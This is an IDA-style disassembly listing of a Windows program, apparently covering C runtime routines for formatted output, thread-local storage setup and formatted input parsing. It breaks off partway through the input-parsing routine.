; ---------------------------------------------------------------------------
loc_41689A: ; CODE XREF: sub_416662+7A�j
; DATA XREF: .text:off_416DD7�o
movsx eax, bl ; jumptable 004166DC case 7
cmp eax, 67h
jg loc_416AEC
cmp eax, 65h
jge loc_41692F
cmp eax, 58h
jg loc_416990
jz loc_416B6D
sub eax, 43h
jz loc_416952
dec eax
dec eax
jz short loc_416925
dec eax
dec eax
jz short loc_416925
sub eax, 0Ch
jnz loc_416CB5
test word ptr [ebp+var_8], 830h
jnz short loc_4168E4
or byte ptr [ebp+var_8+1], 8
loc_4168E4: ; CODE XREF: sub_416662+27C�j
; sub_416662+4A9�j
mov ecx, [ebp+var_C]
cmp ecx, 0FFFFFFFFh
jnz short loc_4168F1
mov ecx, 7FFFFFFFh
loc_4168F1: ; CODE XREF: sub_416662+288�j
add [ebp+arg_8], 4
test word ptr [ebp+var_8], 810h
mov eax, [ebp+arg_8]
mov eax, [eax-4]
mov [ebp+var_10], eax
jz loc_416B42
test eax, eax
jnz short loc_416916
mov eax, off_42D7CC
mov [ebp+var_10], eax
loc_416916: ; CODE XREF: sub_416662+2AA�j
mov eax, [ebp+var_10]
mov [ebp+var_28], 1
jmp loc_416B34
; ---------------------------------------------------------------------------
loc_416925: ; CODE XREF: sub_416662+267�j
; sub_416662+26B�j
mov [ebp+var_3C], 1
add bl, 20h
loc_41692F: ; CODE XREF: sub_416662+247�j
or [ebp+var_8], 40h
cmp [ebp+var_C], 0
lea esi, [ebp+var_254]
mov [ebp+var_10], esi
jge loc_416A36
mov [ebp+var_C], 6
jmp loc_416A7D
; ---------------------------------------------------------------------------
loc_416952: ; CODE XREF: sub_416662+25F�j
test word ptr [ebp+var_8], 830h
jnz short loc_41695E
or byte ptr [ebp+var_8+1], 8
loc_41695E: ; CODE XREF: sub_416662+2F6�j
; sub_416662+336�j
add [ebp+arg_8], 4
test word ptr [ebp+var_8], 810h
mov eax, [ebp+arg_8]
jz short loc_4169CF
movsx eax, word ptr [eax-4]
push eax
lea eax, [ebp+var_254]
push eax
call sub_41C259
test eax, eax
pop ecx
pop ecx
mov [ebp+var_14], eax
jge short loc_4169DF
mov [ebp+var_34], 1
jmp short loc_4169DF
; ---------------------------------------------------------------------------
loc_416990: ; CODE XREF: sub_416662+250�j
sub eax, 5Ah
jz short loc_4169ED
sub eax, 9
jz short loc_41695E
dec eax
jnz loc_416CB5
loc_4169A1: ; CODE XREF: sub_416662+48D�j
or [ebp+var_8], 40h
loc_4169A5: ; CODE XREF: sub_416662+4B1�j
mov [ebp+var_14], 0Ah
loc_4169AC: ; CODE XREF: sub_416662+519�j
; sub_416662+532�j ...
mov ebx, [ebp+var_8]
mov esi, 8000h
test ebx, esi
jz loc_416BDD
mov ecx, [ebp+arg_8]
mov eax, [ecx]
mov edx, [ecx+4]
add ecx, 8
mov [ebp+arg_8], ecx
jmp loc_416C05
; ---------------------------------------------------------------------------
loc_4169CF: ; CODE XREF: sub_416662+309�j
mov al, [eax-4]
mov [ebp+var_254], al
mov [ebp+var_14], 1
loc_4169DF: ; CODE XREF: sub_416662+323�j
; sub_416662+32C�j
lea eax, [ebp+var_254]
mov [ebp+var_10], eax
jmp loc_416CB5
; ---------------------------------------------------------------------------
loc_4169ED: ; CODE XREF: sub_416662+331�j
add [ebp+arg_8], 4
mov eax, [ebp+arg_8]
mov eax, [eax-4]
test eax, eax
jz short loc_416A28
mov ecx, [eax+4]
test ecx, ecx
jz short loc_416A28
test byte ptr [ebp+var_8+1], 8
movsx eax, word ptr [eax]
mov [ebp+var_10], ecx
jz short loc_416A1F
cdq
sub eax, edx
sar eax, 1
mov [ebp+var_28], 1
jmp loc_416CB2
; ---------------------------------------------------------------------------
loc_416A1F: ; CODE XREF: sub_416662+3AA�j
and [ebp+var_28], 0
jmp loc_416CB2
; ---------------------------------------------------------------------------
loc_416A28: ; CODE XREF: sub_416662+397�j
; sub_416662+39E�j
mov eax, off_42D7C8
mov [ebp+var_10], eax
push eax
jmp loc_416AE1
; ---------------------------------------------------------------------------
loc_416A36: ; CODE XREF: sub_416662+2DE�j
jnz short loc_416A46
cmp bl, 67h
jnz short loc_416A7D
mov [ebp+var_C], 1
jmp short loc_416A7D
; ---------------------------------------------------------------------------
loc_416A46: ; CODE XREF: sub_416662:loc_416A36�j
mov eax, 200h
cmp [ebp+var_C], eax
jle short loc_416A53
mov [ebp+var_C], eax
loc_416A53: ; CODE XREF: sub_416662+3EC�j
mov edi, 0A3h
cmp [ebp+var_C], edi
jle short loc_416A7D
mov eax, [ebp+var_C]
add eax, 15Dh
push eax
call sub_414E7D
test eax, eax
pop ecx
mov [ebp+var_2C], eax
jz short loc_416A7A
mov [ebp+var_10], eax
mov esi, eax
jmp short loc_416A7D
; ---------------------------------------------------------------------------
loc_416A7A: ; CODE XREF: sub_416662+40F�j
mov [ebp+var_C], edi
loc_416A7D: ; CODE XREF: sub_416662+2EB�j
; sub_416662+3D9�j ...
mov eax, [ebp+arg_8]
mov ecx, [eax]
push [ebp+var_3C]
add eax, 8
push [ebp+var_C]
mov [ebp+arg_8], eax
mov eax, [eax-4]
mov [ebp+var_48], eax
movsx eax, bl
push eax
lea eax, [ebp+var_4C]
push esi
push eax
mov [ebp+var_4C], ecx
call off_42DE88
mov edi, [ebp+var_8]
add esp, 14h
and edi, 80h
jz short loc_416AC2
cmp [ebp+var_C], 0
jnz short loc_416AC2
push esi
call off_42DE94
pop ecx
loc_416AC2: ; CODE XREF: sub_416662+450�j
; sub_416662+456�j
cmp bl, 67h
jnz short loc_416AD3
test edi, edi
jnz short loc_416AD3
push esi
call off_42DE8C
pop ecx
loc_416AD3: ; CODE XREF: sub_416662+463�j
; sub_416662+467�j
cmp byte ptr [esi], 2Dh
jnz short loc_416AE0
or byte ptr [ebp+var_8+1], 1
inc esi
mov [ebp+var_10], esi
loc_416AE0: ; CODE XREF: sub_416662+474�j
push esi
loc_416AE1: ; CODE XREF: sub_416662+3CF�j
call sub_4179C0
pop ecx
jmp loc_416CB2
; ---------------------------------------------------------------------------
loc_416AEC: ; CODE XREF: sub_416662+23E�j
sub eax, 69h
jz loc_4169A1
sub eax, 5
jz loc_416BB3
dec eax
jz loc_416B99
dec eax
jz short loc_416B66
sub eax, 3
jz loc_4168E4
dec eax
dec eax
jz loc_4169A5
sub eax, 3
jnz loc_416CB5
mov [ebp+var_30], 27h
jmp short loc_416B70
; ---------------------------------------------------------------------------
loc_416B2B: ; CODE XREF: sub_416662+4D4�j
dec ecx
cmp word ptr [eax], 0
jz short loc_416B38
inc eax
inc eax
loc_416B34: ; CODE XREF: sub_416662+2BE�j
test ecx, ecx
jnz short loc_416B2B
loc_416B38: ; CODE XREF: sub_416662+4CE�j
sub eax, [ebp+var_10]
sar eax, 1
jmp loc_416CB2
; ---------------------------------------------------------------------------
loc_416B42: ; CODE XREF: sub_416662+2A2�j
test eax, eax
jnz short loc_416B4E
mov eax, off_42D7C8
mov [ebp+var_10], eax
loc_416B4E: ; CODE XREF: sub_416662+4E2�j
mov eax, [ebp+var_10]
jmp short loc_416B5A
; ---------------------------------------------------------------------------
loc_416B53: ; CODE XREF: sub_416662+4FA�j
dec ecx
cmp byte ptr [eax], 0
jz short loc_416B5E
inc eax
loc_416B5A: ; CODE XREF: sub_416662+4EF�j
test ecx, ecx
jnz short loc_416B53
loc_416B5E: ; CODE XREF: sub_416662+4F5�j
sub eax, [ebp+var_10]
jmp loc_416CB2
; ---------------------------------------------------------------------------
loc_416B66: ; CODE XREF: sub_416662+4A4�j
mov [ebp+var_C], 8
loc_416B6D: ; CODE XREF: sub_416662+256�j
mov [ebp+var_30], ecx
loc_416B70: ; CODE XREF: sub_416662+4C7�j
test byte ptr [ebp+var_8], 80h
mov [ebp+var_14], 10h
jz loc_4169AC
mov al, byte ptr [ebp+var_30]
add al, 51h
mov [ebp+var_1C], 30h
mov [ebp+var_1B], al
mov [ebp+var_20], 2
jmp loc_4169AC
; ---------------------------------------------------------------------------
loc_416B99: ; CODE XREF: sub_416662+49D�j
test byte ptr [ebp+var_8], 80h
mov [ebp+var_14], 8
jz loc_4169AC
or byte ptr [ebp+var_8+1], 2
jmp loc_4169AC
; ---------------------------------------------------------------------------
loc_416BB3: ; CODE XREF: sub_416662+496�j
add [ebp+arg_8], 4
test byte ptr [ebp+var_8], 20h
mov eax, [ebp+arg_8]
mov eax, [eax-4]
jz short loc_416BCC
mov cx, word ptr [ebp+var_18]
mov [eax], cx
jmp short loc_416BD1
; ---------------------------------------------------------------------------
loc_416BCC: ; CODE XREF: sub_416662+55F�j
mov ecx, [ebp+var_18]
mov [eax], ecx
loc_416BD1: ; CODE XREF: sub_416662+568�j
mov [ebp+var_34], 1
jmp loc_416DA4
; ---------------------------------------------------------------------------
loc_416BDD: ; CODE XREF: sub_416662+354�j
add [ebp+arg_8], 4
test bl, 20h
mov eax, [ebp+arg_8]
jz short loc_416BFB
test bl, 40h
jz short loc_416BF5
movsx eax, word ptr [eax-4]
loc_416BF2: ; CODE XREF: sub_416662+597�j
; sub_416662+59F�j
cdq
jmp short loc_416C05
; ---------------------------------------------------------------------------
loc_416BF5: ; CODE XREF: sub_416662+58A�j
movzx eax, word ptr [eax-4]
jmp short loc_416BF2
; ---------------------------------------------------------------------------
loc_416BFB: ; CODE XREF: sub_416662+585�j
test bl, 40h
mov eax, [eax-4]
jnz short loc_416BF2
xor edx, edx
loc_416C05: ; CODE XREF: sub_416662+368�j
; sub_416662+591�j
test bl, 40h
jz short loc_416C1F
test edx, edx
jg short loc_416C1F
jl short loc_416C14
test eax, eax
jnb short loc_416C1F
loc_416C14: ; CODE XREF: sub_416662+5AC�j
neg eax
adc edx, 0
neg edx
or byte ptr [ebp+var_8+1], 1
loc_416C1F: ; CODE XREF: sub_416662+5A6�j
; sub_416662+5AA�j ...
test [ebp+var_8], esi
mov ebx, eax
mov edi, edx
jnz short loc_416C2A
xor edi, edi
loc_416C2A: ; CODE XREF: sub_416662+5C4�j
cmp [ebp+var_C], 0
jge short loc_416C39
mov [ebp+var_C], 1
jmp short loc_416C4A
; ---------------------------------------------------------------------------
loc_416C39: ; CODE XREF: sub_416662+5CC�j
and [ebp+var_8], 0FFFFFFF7h
mov eax, 200h
cmp [ebp+var_C], eax
jle short loc_416C4A
mov [ebp+var_C], eax
loc_416C4A: ; CODE XREF: sub_416662+5D5�j
; sub_416662+5E3�j
mov eax, ebx
or eax, edi
jnz short loc_416C54
and [ebp+var_20], 0
loc_416C54: ; CODE XREF: sub_416662+5EC�j
lea esi, [ebp+var_55]
loc_416C57: ; CODE XREF: sub_416662+627�j
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jg short loc_416C67
mov eax, ebx
or eax, edi
jz short loc_416C8B
loc_416C67: ; CODE XREF: sub_416662+5FD�j
mov eax, [ebp+var_14]
cdq
push edx
push eax
push edi
push ebx
call sub_414F60
add ecx, 30h
cmp ecx, 39h
mov [ebp+var_40], ebx
mov ebx, eax
mov edi, edx
jle short loc_416C86
add ecx, [ebp+var_30]
loc_416C86: ; CODE XREF: sub_416662+61F�j
mov [esi], cl
dec esi
jmp short loc_416C57
; ---------------------------------------------------------------------------
loc_416C8B: ; CODE XREF: sub_416662+603�j
lea eax, [ebp+var_55]
sub eax, esi
inc esi
test byte ptr [ebp+var_8+1], 2
mov [ebp+var_14], eax
mov [ebp+var_10], esi
jz short loc_416CB5
mov ecx, esi
cmp byte ptr [ecx], 30h
jnz short loc_416CA8
test eax, eax
jnz short loc_416CB5
loc_416CA8: ; CODE XREF: sub_416662+640�j
dec [ebp+var_10]
mov ecx, [ebp+var_10]
mov byte ptr [ecx], 30h
inc eax
loc_416CB2: ; CODE XREF: sub_416662+3B8�j
; sub_416662+3C1�j ...
mov [ebp+var_14], eax
loc_416CB5: ; CODE XREF: sub_416662+270�j
; sub_416662+339�j ...
cmp [ebp+var_34], 0
jnz loc_416DA4
mov ebx, [ebp+var_8]
test bl, 40h
jz short loc_416CED
test bh, 1
jz short loc_416CD2
mov [ebp+var_1C], 2Dh
jmp short loc_416CE6
; ---------------------------------------------------------------------------
loc_416CD2: ; CODE XREF: sub_416662+668�j
test bl, 1
jz short loc_416CDD
mov [ebp+var_1C], 2Bh
jmp short loc_416CE6
; ---------------------------------------------------------------------------
loc_416CDD: ; CODE XREF: sub_416662+673�j
test bl, 2
jz short loc_416CED
mov [ebp+var_1C], 20h
loc_416CE6: ; CODE XREF: sub_416662+66E�j
; sub_416662+679�j
mov [ebp+var_20], 1
loc_416CED: ; CODE XREF: sub_416662+663�j
; sub_416662+67E�j
mov esi, [ebp+var_24]
sub esi, [ebp+var_20]
sub esi, [ebp+var_14]
test bl, 0Ch
jnz short loc_416D0C
push [ebp+arg_0]
lea eax, [ebp+var_18]
push esi
push 20h
call sub_416607
add esp, 0Ch
loc_416D0C: ; CODE XREF: sub_416662+697�j
push [ebp+var_20]
mov edi, [ebp+arg_0]
lea eax, [ebp+var_18]
lea ecx, [ebp+var_1C]
call sub_41662B
test bl, 8
pop ecx
jz short loc_416D37
test bl, 4
jnz short loc_416D37
push edi
push esi
push 30h
lea eax, [ebp+var_18]
call sub_416607
add esp, 0Ch
loc_416D37: ; CODE XREF: sub_416662+6BF�j
; sub_416662+6C4�j
cmp [ebp+var_28], 0
jz short loc_416D7E
cmp [ebp+var_14], 0
jle short loc_416D7E
mov eax, [ebp+var_14]
mov ebx, [ebp+var_10]
mov [ebp+var_40], eax
loc_416D4C: ; CODE XREF: sub_416662+718�j
dec [ebp+var_40]
xor eax, eax
mov ax, [ebx]
push eax
lea eax, [ebp+var_54]
push eax
call sub_41C259
inc ebx
pop ecx
inc ebx
test eax, eax
pop ecx
jle short loc_416D8D
mov edi, [ebp+arg_0]
push eax
lea eax, [ebp+var_18]
lea ecx, [ebp+var_54]
call sub_41662B
cmp [ebp+var_40], 0
pop ecx
jnz short loc_416D4C
jmp short loc_416D8D
; ---------------------------------------------------------------------------
loc_416D7E: ; CODE XREF: sub_416662+6D9�j
; sub_416662+6DF�j
push [ebp+var_14]
mov ecx, [ebp+var_10]
lea eax, [ebp+var_18]
call sub_41662B
pop ecx
loc_416D8D: ; CODE XREF: sub_416662+702�j
; sub_416662+71A�j
test byte ptr [ebp+var_8], 4
jz short loc_416DA4
push [ebp+arg_0]
lea eax, [ebp+var_18]
push esi
push 20h
call sub_416607
add esp, 0Ch
loc_416DA4: ; CODE XREF: sub_416662+576�j
; sub_416662+657�j ...
cmp [ebp+var_2C], 0
jz short loc_416DB7 ; default
push [ebp+var_2C]
call sub_414A14
and [ebp+var_2C], 0
pop ecx
loc_416DB7: ; CODE XREF: sub_416662+74�j
; sub_416662+99�j ...
mov edi, [ebp+arg_4] ; default
mov bl, [edi]
test bl, bl
jnz loc_416697
loc_416DC4: ; CODE XREF: sub_416662+40�j
pop edi
pop esi
loc_416DC6: ; CODE XREF: sub_416662+29�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
mov eax, [ebp+var_18]
pop ebx
call sub_41A1F6
leave
retn
sub_416662 endp
; ---------------------------------------------------------------------------
off_416DD7 dd offset loc_416861 ; DATA XREF: sub_416662+7A�r
dd offset loc_4166E3 ; jump table for switch statement
dd offset loc_416700
dd offset loc_41674C
dd offset loc_416787
dd offset loc_416790
dd offset loc_4167C8
dd offset loc_41689A
; =============== S U B R O U T I N E =======================================
sub_416DF7 proc near ; CODE XREF: sub_416E86:loc_416E9F�p
; sub_416E86:loc_416EEC�p
call sub_41819C
mov eax, dword_42D7D0
cmp eax, 0FFFFFFFFh
jz short locret_416E14
push eax
call ds:dword_42016C ; TlsFree
or dword_42D7D0, 0FFFFFFFFh
locret_416E14: ; CODE XREF: sub_416DF7+D�j
retn
sub_416DF7 endp
; =============== S U B R O U T I N E =======================================
sub_416E15 proc near ; CODE XREF: sub_414794�p sub_4147A1�p ...
push ebx
push esi
call ds:dword_420008 ; RtlGetLastWin32Error
push dword_42D7D0
mov ebx, eax
call ds:dword_42017C ; TlsGetValue
mov esi, eax
test esi, esi
jnz short loc_416E7A
push 88h
push 1
call sub_41C280
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_416E72
push esi
push dword_42D7D0
call ds:dword_420178 ; TlsSetValue
test eax, eax
jz short loc_416E72
mov dword ptr [esi+54h], offset dword_42E048
mov dword ptr [esi+14h], 1
call ds:dword_420174 ; GetCurrentThreadId
or dword ptr [esi+4], 0FFFFFFFFh
mov [esi], eax
jmp short loc_416E7A
; ---------------------------------------------------------------------------
loc_416E72: ; CODE XREF: sub_416E15+2E�j
; sub_416E15+3F�j
push 10h
call sub_4162A0
pop ecx
loc_416E7A: ; CODE XREF: sub_416E15+1A�j
; sub_416E15+5B�j
push ebx
call ds:dword_420170 ; RtlSetLastWin32Error
mov eax, esi
pop esi
pop ebx
retn
sub_416E15 endp
; =============== S U B R O U T I N E =======================================
sub_416E86 proc near ; CODE XREF: .text:loc_4163C4�p
call sub_418153
test eax, eax
jz short loc_416E9F
call ds:dword_420180 ; TlsAlloc
cmp eax, 0FFFFFFFFh
mov dword_42D7D0, eax
jnz short loc_416EA7
loc_416E9F: ; CODE XREF: sub_416E86+7�j
call sub_416DF7
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_416EA7: ; CODE XREF: sub_416E86+17�j
push esi
push 88h
push 1
call sub_41C280
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_416EEC
push esi
push dword_42D7D0
call ds:dword_420178 ; TlsSetValue
test eax, eax
jz short loc_416EEC
mov dword ptr [esi+54h], offset dword_42E048
mov dword ptr [esi+14h], 1
call ds:dword_420174 ; GetCurrentThreadId
or dword ptr [esi+4], 0FFFFFFFFh
mov [esi], eax
xor eax, eax
inc eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_416EEC: ; CODE XREF: sub_416E86+34�j
; sub_416E86+45�j
call sub_416DF7
xor eax, eax
pop esi
retn
sub_416E86 endp
; =============== S U B R O U T I N E =======================================
sub_416EF5 proc near ; CODE XREF: sub_416F0B+52�p
; sub_416F0B+1EF�p ...
dec dword ptr [edx+4]
js short loc_416F03
mov ecx, [edx]
movzx eax, byte ptr [ecx]
inc ecx
mov [edx], ecx
retn
; ---------------------------------------------------------------------------
loc_416F03: ; CODE XREF: sub_416EF5+3�j
push edx
call sub_418DD9
pop ecx
retn
sub_416EF5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416F0B proc near ; CODE XREF: sub_4147C3+2A�p
var_1D8 = word ptr -1D8h
var_1D4 = byte ptr -1D4h
var_1D3 = byte ptr -1D3h
var_1D0 = dword ptr -1D0h
var_1CC = dword ptr -1CCh
var_1C8 = byte ptr -1C8h
var_1C7 = byte ptr -1C7h
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_4F = byte ptr -4Fh
var_4E = byte ptr -4Eh
var_4D = byte ptr -4Dh
var_4C = byte ptr -4Ch
var_4B = byte ptr -4Bh
var_4A = byte ptr -4Ah
var_49 = byte ptr -49h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_39 = byte ptr -39h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_29 = byte ptr -29h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 1C8h
push offset stru_428E78
call __SEH_prolog
mov eax, dword_42DEA8
xor eax, [ebp+4]
mov [ebp+var_1C], eax
xor eax, eax
mov [ebp+var_20], eax
mov [ebp+var_24], eax
mov [ebp+var_28], eax
and [ebp+var_29], al
mov [ebp+var_30], eax
mov [ebp+var_34], eax
loc_416F39: ; CODE XREF: sub_416F0B+88�j
; sub_416F0B+A55�j ...
mov eax, [ebp+arg_4]
mov al, [eax]
test al, al
jz loc_417978
movzx eax, al
push eax
call sub_41C3B4
pop ecx
test eax, eax
jz short loc_416F95
dec [ebp+var_30]
loc_416F57: ; CODE XREF: sub_416F0B+62�j
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_416EF5
mov esi, eax
push esi
call sub_41C3B4
pop ecx
test eax, eax
jnz short loc_416F57
cmp esi, 0FFFFFFFFh
jz short loc_416F7F
push [ebp+arg_0]
push esi
call sub_41C3EE
pop ecx
pop ecx
loc_416F7F: ; CODE XREF: sub_416F0B+67�j
; sub_416F0B+86�j
inc [ebp+arg_4]
mov eax, [ebp+arg_4]
movzx eax, byte ptr [eax]
push eax
call sub_41C3B4
pop ecx
test eax, eax
jnz short loc_416F7F
jmp short loc_416F39
; ---------------------------------------------------------------------------
loc_416F95: ; CODE XREF: sub_416F0B+47�j
mov esi, [ebp+arg_4]
cmp byte ptr [esi], 25h
jnz loc_4178F4
xor edi, edi
mov [ebp+var_38], edi
and [ebp+var_39], 0
mov [ebp+var_40], edi
mov [ebp+var_44], edi
mov [ebp+var_48], edi
and [ebp+var_49], 0
and [ebp+var_4A], 0
and [ebp+var_4B], 0
and [ebp+var_4C], 0
and [ebp+var_4D], 0
and [ebp+var_4E], 0
mov [ebp+var_4F], 1
mov [ebp+var_54], edi
loc_416FD2: ; CODE XREF: sub_416F0B+186�j
inc esi
movzx ebx, byte ptr [esi]
movzx eax, bl
push eax
call sub_41C33B
pop ecx
test eax, eax
jz short loc_416FF3
inc [ebp+var_44]
lea eax, [edi+edi*4]
lea edi, [ebx+eax*2-30h]
jmp loc_41708D
; ---------------------------------------------------------------------------
loc_416FF3: ; CODE XREF: sub_416F0B+D7�j
cmp ebx, 4Eh
jg short loc_41706B
jz loc_41708D
cmp ebx, 2Ah
jz short loc_417066
cmp ebx, 46h
jz loc_41708D
cmp ebx, 49h
jz short loc_41701B
cmp ebx, 4Ch
jnz short loc_41707A
inc [ebp+var_4F]
jmp short loc_41708D
; ---------------------------------------------------------------------------
loc_41701B: ; CODE XREF: sub_416F0B+104�j
mov cl, [esi+1]
cmp cl, 36h
jnz short loc_41703A
lea eax, [esi+2]
cmp byte ptr [eax], 34h
jnz short loc_41703A
mov esi, eax
inc [ebp+var_54]
and [ebp+var_5C], 0
and [ebp+var_58], 0
jmp short loc_41708D
; ---------------------------------------------------------------------------
loc_41703A: ; CODE XREF: sub_416F0B+116�j
; sub_416F0B+11E�j
cmp cl, 33h
jnz short loc_41704B
lea eax, [esi+2]
cmp byte ptr [eax], 32h
jnz short loc_41704B
mov esi, eax
jmp short loc_41708D
; ---------------------------------------------------------------------------
loc_41704B: ; CODE XREF: sub_416F0B+132�j
; sub_416F0B+13A�j
cmp cl, 64h
jz short loc_41708D
cmp cl, 69h
jz short loc_41708D
cmp cl, 6Fh
jz short loc_41708D
cmp cl, 78h
jz short loc_41708D
cmp cl, 58h
jnz short loc_41707A
jmp short loc_41708D
; ---------------------------------------------------------------------------
loc_417066: ; CODE XREF: sub_416F0B+F6�j
inc [ebp+var_4B]
jmp short loc_41708D
; ---------------------------------------------------------------------------
loc_41706B: ; CODE XREF: sub_416F0B+EB�j
cmp ebx, 68h
jz short loc_417087
cmp ebx, 6Ch
jz short loc_41707F
cmp ebx, 77h
jz short loc_417082
loc_41707A: ; CODE XREF: sub_416F0B+109�j
; sub_416F0B+157�j
inc [ebp+var_4C]
jmp short loc_41708D
; ---------------------------------------------------------------------------
loc_41707F: ; CODE XREF: sub_416F0B+168�j
inc [ebp+var_4F]
loc_417082: ; CODE XREF: sub_416F0B+16D�j
inc [ebp+var_4E]
jmp short loc_41708D
; ---------------------------------------------------------------------------
loc_417087: ; CODE XREF: sub_416F0B+163�j
dec [ebp+var_4F]
dec [ebp+var_4E]
loc_41708D: ; CODE XREF: sub_416F0B+E3�j
; sub_416F0B+ED�j ...
cmp [ebp+var_4C], 0
jz loc_416FD2
mov [ebp+var_48], edi
mov [ebp+arg_4], esi
cmp [ebp+var_4B], 0
jnz short loc_4170B7
mov eax, [ebp+arg_8]
mov [ebp+var_60], eax
add eax, 4
mov [ebp+arg_8], eax
mov ebx, [eax-4]
mov [ebp+var_64], ebx
jmp short loc_4170BA
; ---------------------------------------------------------------------------
loc_4170B7: ; CODE XREF: sub_416F0B+196�j
mov ebx, [ebp+var_64]
loc_4170BA: ; CODE XREF: sub_416F0B+1AA�j
and [ebp+var_4C], 0
cmp [ebp+var_4E], 0
jnz short loc_4170D8
mov al, [esi]
cmp al, 53h
jz short loc_4170D4
cmp al, 43h
jz short loc_4170D4
or [ebp+var_4E], 0FFh
jmp short loc_4170D8
; ---------------------------------------------------------------------------
loc_4170D4: ; CODE XREF: sub_416F0B+1BD�j
; sub_416F0B+1C1�j
mov [ebp+var_4E], 1
loc_4170D8: ; CODE XREF: sub_416F0B+1B7�j
; sub_416F0B+1C7�j
movzx edi, byte ptr [esi]
or edi, 20h
mov [ebp+var_68], edi
cmp edi, 6Eh
jz short loc_41710F
cmp edi, 63h
jz loc_41716F
cmp edi, 7Bh
jz short loc_41716F
loc_4170F4: ; CODE XREF: sub_416F0B+1FF�j
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_416EF5
mov esi, eax
push esi
call sub_41C3B4
pop ecx
test eax, eax
jnz short loc_4170F4
mov [ebp+var_28], esi
loc_41710F: ; CODE XREF: sub_416F0B+1D9�j
mov esi, [ebp+arg_0]
loc_417112: ; CODE XREF: sub_416F0B+274�j
mov ecx, [ebp+var_44]
test ecx, ecx
jz short loc_417123
cmp [ebp+var_48], 0
jz loc_417378
loc_417123: ; CODE XREF: sub_416F0B+20C�j
cmp edi, 6Fh
jg loc_417347
jz loc_4176BA
cmp edi, 63h
jz loc_417326
cmp edi, 64h
jz loc_4176BA
jle loc_41736D
cmp edi, 67h
jle short loc_417199
cmp edi, 69h
jz short loc_417181
cmp edi, 6Eh
jnz loc_41736D
mov eax, [ebp+var_30]
cmp [ebp+var_4B], 0
jz loc_4178CC
jmp loc_4178EC
; ---------------------------------------------------------------------------
loc_41716F: ; CODE XREF: sub_416F0B+1DE�j
; sub_416F0B+1E7�j
inc [ebp+var_30]
mov esi, [ebp+arg_0]
mov edx, esi
call sub_416EF5
mov [ebp+var_28], eax
jmp short loc_417112
; ---------------------------------------------------------------------------
loc_417181: ; CODE XREF: sub_416F0B+247�j
push 64h
pop edi
loc_417184: ; CODE XREF: sub_416F0B+457�j
mov ebx, [ebp+var_28]
cmp ebx, 2Dh
jnz loc_4175B3
mov [ebp+var_4A], 1
jmp loc_4175B8
; ---------------------------------------------------------------------------
loc_417199: ; CODE XREF: sub_416F0B+242�j
lea esi, [ebp+var_1C8]
mov ebx, [ebp+var_28]
cmp ebx, 2Dh
jnz short loc_4171B5
mov [ebp+var_1C8], bl
lea esi, [ebp+var_1C7]
jmp short loc_4171BA
; ---------------------------------------------------------------------------
loc_4171B5: ; CODE XREF: sub_416F0B+29A�j
cmp ebx, 2Bh
jnz short loc_4171D1
loc_4171BA: ; CODE XREF: sub_416F0B+2A8�j
dec [ebp+var_48]
inc [ebp+var_30]
mov edi, [ebp+arg_0]
mov edx, edi
call sub_416EF5
mov ebx, eax
mov [ebp+var_28], ebx
jmp short loc_4171D4
; ---------------------------------------------------------------------------
loc_4171D1: ; CODE XREF: sub_416F0B+2AD�j
mov edi, [ebp+arg_0]
loc_4171D4: ; CODE XREF: sub_416F0B+2C4�j
cmp [ebp+var_44], 0
jz short loc_4171E3
cmp [ebp+var_48], 15Dh
jle short loc_41720B
loc_4171E3: ; CODE XREF: sub_416F0B+2CD�j
mov [ebp+var_48], 15Dh
jmp short loc_41720B
; ---------------------------------------------------------------------------
loc_4171EC: ; CODE XREF: sub_416F0B+309�j
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jz short loc_417216
inc [ebp+var_40]
mov [esi], bl
inc esi
inc [ebp+var_30]
mov edx, edi
call sub_416EF5
mov ebx, eax
mov [ebp+var_28], ebx
loc_41720B: ; CODE XREF: sub_416F0B+2D6�j
; sub_416F0B+2DF�j
push ebx
call sub_41C33B
pop ecx
test eax, eax
jnz short loc_4171EC
loc_417216: ; CODE XREF: sub_416F0B+2E9�j
cmp byte_42E0F8, bl
jnz short loc_417268
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jz short loc_417268
inc [ebp+var_30]
mov edx, edi
call sub_416EF5
mov ebx, eax
mov al, byte_42E0F8
mov [esi], al
inc esi
jmp short loc_41725A
; ---------------------------------------------------------------------------
loc_41723E: ; CODE XREF: sub_416F0B+35B�j
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jz short loc_417268
inc [ebp+var_40]
mov [esi], bl
inc esi
inc [ebp+var_30]
mov edx, edi
call sub_416EF5
mov ebx, eax
loc_41725A: ; CODE XREF: sub_416F0B+331�j
push ebx
mov [ebp+var_28], ebx
call sub_41C33B
pop ecx
test eax, eax
jnz short loc_41723E
loc_417268: ; CODE XREF: sub_416F0B+311�j
; sub_416F0B+31B�j ...
cmp [ebp+var_40], 0
jz short loc_4172DD
cmp ebx, 65h
jz short loc_417278
cmp ebx, 45h
jnz short loc_4172DD
loc_417278: ; CODE XREF: sub_416F0B+366�j
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jz short loc_4172DD
mov byte ptr [esi], 65h
inc esi
inc [ebp+var_30]
mov edx, edi
call sub_416EF5
mov ebx, eax
mov [ebp+var_28], ebx
cmp ebx, 2Dh
jnz short loc_41729F
mov [esi], al
inc esi
jmp short loc_4172A4
; ---------------------------------------------------------------------------
loc_41729F: ; CODE XREF: sub_416F0B+38D�j
cmp ebx, 2Bh
jnz short loc_4172D2
